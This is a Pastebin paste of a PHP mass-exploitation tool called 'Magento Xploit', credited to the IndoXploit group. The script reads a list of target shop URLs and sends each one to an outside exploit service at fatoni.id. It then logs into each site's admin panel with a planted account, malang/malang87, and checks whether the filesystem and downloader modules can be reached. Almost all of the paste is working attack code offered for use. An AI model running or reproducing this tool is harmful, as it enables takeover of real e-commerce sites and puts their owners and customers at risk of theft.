daily pastebin goal
63%
SHARE
TWEET

Untitled

a guest Sep 22nd, 2016 61 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. function cover() {
  3.  return "<center>[+] Magento Xploit [+]<br>
  4.  ## -= IndoXploit - Sanjungan Jiwa =- ##<br>
  5.  ## Thanks to: fatoni.id/malangXploit.php -  Synchronizer ##<br>
  6.  ## Recoded by Mr. Error 404 | IndoXploit ##<br><br></center>";
  7. }
  8. function ngcurl($url,$post=null) {
  9.  $ch = curl_init($url);
  10.  if($post != null) {
  11.       curl_setopt($ch, CURLOPT_POST, true);
  12.       curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  13.  }
  14.       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  15.       curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  16.       curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  17.       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  18.       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  19.       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  20.       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  21.  return curl_exec($ch);
  22.       curl_close($ch);
  23. }
  24. function ambilKata($param, $kata1, $kata2){
  25.     if(strpos($param, $kata1) === FALSE) return FALSE;
  26.     if(strpos($param, $kata2) === FALSE) return FALSE;
  27.     $start = strpos($param, $kata1) + strlen($kata1);
  28.     $end = strpos($param, $kata2, $start);
  29.     $return = substr($param, $start, $end - $start);
  30.     return $return;
  31. }
  32. echo cover();
  33. ?>
  34. <?php
  35. $link = explode("\r\n", $_POST['target']);
  36. $go = $_POST['go'];
  37. if(isset($go)) {
  38.  foreach($link as $url) {
  39.   $post_to_fatoni = array(
  40.    "url" => $url,
  41.    "hajar" => "Xploit!",
  42.   );
  43.   $curl_fatoni = ngcurl("http://fatoni.id/malangXploit.php", $post_to_fatoni);
  44.   if(preg_match("/Exploiting Success, mulai mengecek login../", $curl_fatoni)) {
  45.    echo "Target: <a href='$url' target='_blank'>$url</a><br>";
  46.    echo "Status: Sukses Di Xploit<br>";
  47.    echo "Ngecek Login........  ";
  48.    $ambil = htmlspecialchars(@file_get_contents($url));
  49.    preg_match("/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\">/", $ambil, $key);
  50.    $post_login = array(
  51.              "form_key" => $key[1],
  52.              "login[username]" => "malang",
  53.              "dummy" => "",
  54.              "login[password]" => "malang87",
  55.             );
  56.    $login = ngcurl($url."/admin/", $post_login);
  57.          if(preg_match("/Log Out|malang/", $login)) {
  58.           $key2 = ambilKata($login,"/filesystem/adminhtml_filesystem/index/key/","/");
  59.           $key3 = ambilKata($login,"/system_account/index/key/","/");
  60.           echo "OK<br>";
  61.           echo "username: malang<br>";
  62.           echo "password: malang87<br>";
  63.           echo "Filesystem: ";
  64.           $curl_filesystem = ngcurl($url."/filesystem/adminhtml_filesystem/index/key/$key2/", null);
  65.           if(preg_match("/File System/", $curl_filesystem)) {
  66.            echo "Ada<br>";
  67.           } else {
  68.            echo "Gaada<br>";
  69.           }
  70.           echo "Downloader: ";
  71.           $post_downloader = array(
  72.            "username" => "malang",
  73.            "password" => "malang87",
  74.            );
  75.           $url_d = parse_url($url, PHP_URL_HOST);
  76.           $curl_downloader = ngcurl($url_d."/downloader/", $post_downloader);
  77.           if(preg_match("/Return to Admin|Log Out/i", $curl_downloader)) {
  78.            if(preg_match("/Your Magento folder does not have sufficient write permissions./", $curl_downloader)) {
  79.             $stat_down = "<font color=red>Permissions</font>";
  80.            } else {
  81.             $stat_down = "<font color='#008000'>Permissions</font>";
  82.            }
  83.            echo "Ada [ <a href='http://$url_d/downloader/' target='_blank'>http://$url_d/downloader/</a> ( $stat_down ) ]<br>";
  84.           } else {
  85.            echo "Gaada<br>";
  86.           }
  87.          } else {
  88.           echo "Gagal<br>";
  89.          }
  90.      echo "<br>";
  91.   } else {
  92.    echo "Target: $url<br>";
  93.    echo "Status: Gagal Di Xploit<br><br>";
  94.   }
  95.  }
  96. } else {
  97. ?>
  98. <html>
  99. <center>
  100. <form method="post">
  101. <textarea name="target" placeholder="http://www.target.com/" style="width: 500px; height: 250px;"></textarea><br>
  102. <input type="submit" name="go" value="Xploit" style="width: 500px;">
  103. </form>
  104. </center>
  105. </html>
  106. <?php
  107. }
  108. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top